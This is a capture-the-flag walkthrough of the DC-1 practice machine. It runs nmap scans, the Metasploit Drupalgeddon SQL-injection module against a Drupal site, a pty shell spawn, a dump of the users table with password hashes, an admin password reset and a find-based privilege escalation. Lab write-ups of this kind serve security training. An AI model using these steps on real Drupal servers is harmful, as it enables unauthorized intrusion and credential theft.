DC1 target drone practice

environment

kali2018, DC target drone, VM

Scan host

1. Check the MAC address of the DC in net mode as follows
2. Open kali to execute the command while turning on the DC

nmap -sn 192.168.80.0/24 

Among the scanned addresses, 192.168.80.138 is the address of kali itself, and 192.168.80.139 is the IP address of the target target machine DC. You can directly access it with a browser to see the DC interface as follows

Viewing the website will reveal the Drupal framework, no other information available, perform a port scan

port scan

nmap -p- -A -v 192.168.80.139

The scan results are as follows:

A total of 4 ports were scanned, among which robots.txt was found on port 80. You can try to access it directly
to get the content of robots.txt as follows:

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used:    http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/wc/robots.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html

User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

If no extra useful information is obtained, proceed to the next step to scan the website directory.

Use the directory scanner in msfconsole to scan website directories

root@kali:~# msfconsole
msf > use auxiliary/scanner/http/dir_scanner
msf auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.80.139
msf auxiliary(scanner/http/dir_scanner) > set THREADS 20
msf auxiliary(scanner/http/dir_scanner) > show options
msf auxiliary(scanner/http/dir_scanner) > run

The scan results are as follows, but most websites are 403, and others are of no practical use.

Query in msfconsole and try tools for Drupal

msf > search drupal

What to find:

Matching Modules
================

   Name                                           Disclosure Date  Rank       Description
   ----                                           ---------------  ----       -----------
   auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Drupal OpenID External Entity Injection
   auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Drupal Views Module Users Enumeration
   exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  Drupal HTTP Parameter Key/Value SQL Injection
   exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Drupal CODER Module Remote Command Execution
   exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Drupal Drupalgeddon 2 Forms API Property Injection
   exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Drupal RESTWS Module Remote PHP Code Execution
   exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  PHP XML-RPC Arbitrary Code Execution

Use the third command to perform SQL injection and execute the following commands in sequence:

msf > use exploit/multi/http/drupal_drupageddon
msf exploit(multi/http/drupal_drupageddon) > set RHOST 192.168.80.139
RHOST => 192.168.80.139
msf exploit(multi/http/drupal_drupageddon) > run

Obtaining the following results indicates successful injection

Then if you check with ls, you will find a flag1.txt file. If you check the website, you will find a prompt, so you need to find the configuration file next.

Drupal's configuration file is located at /sites/default/settings.php, jump to view

Database operations

Failed to enter the database. Enter shell to switch shells and enter the command again. The database will be entered, but the information cannot be echoed.

mysql -udbuser -p

Use the following statement to echo information in the shell.

python -c 'import pty;pty.spawn("/bin/sh")'

get information

mysql> select * from users;
select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name  | pass                                                    | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
|   0 |       |                                                         |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                   | NULL |
|   1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | [email protected] |       |           | NULL             | 1550581826 | 1550583852 | 1550582362 |      1 | Australia/Melbourne |          |       0 | [email protected] | b:0; |
|   2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | [email protected]  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | [email protected]  | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
3 rows in set (0.00 sec)

Enter the command from the shell to change the password
and then return to the database to update the password.

Log in to the admin in the browser and you will find the flag3 information.

Use the find command to escalate privileges

It prompts that special permissions are required to obtain the password. First check the passwd and find the location of flag4.
Enter the location of flag4 to view the found content. It shows that privileges need to be elevated to access. Enter
the shell and use root to execute the find command. You will find the final flag.

View the final flag. End!

cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

Reference article 1
Reference article 2